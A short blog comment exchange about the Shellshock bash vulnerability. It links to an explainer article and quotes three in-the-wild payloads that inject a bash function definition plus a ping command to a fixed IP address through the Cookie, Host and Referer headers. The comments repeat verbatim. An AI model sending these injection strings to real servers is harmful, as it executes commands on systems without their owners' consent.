It’s valuable to see even a simple example of how this bug works. I’m still trying to convince some people as to the severity of this bug. Concreteness helps.
I don’t think it gets much more concrete than this: http://www.troyhunt.com/2014/09/everything-you-need-to-know-about.html
http-header = Cookie:() { :; }; ping -c 3 209.126.230.74 http-header = Host:() { :; }; ping -c 3 209.126.230.74 http-header = Referer:() { :; }; ping -c 3 209.126.230.74
It’s valuable to see even a simple example of how this bug works. I’m still trying to convince some people as to the severity of this bug. Concreteness helps.
I don’t think it gets much more concrete than this: http://www.troyhunt.com/2014/09/everything-you-need-to-know-about.html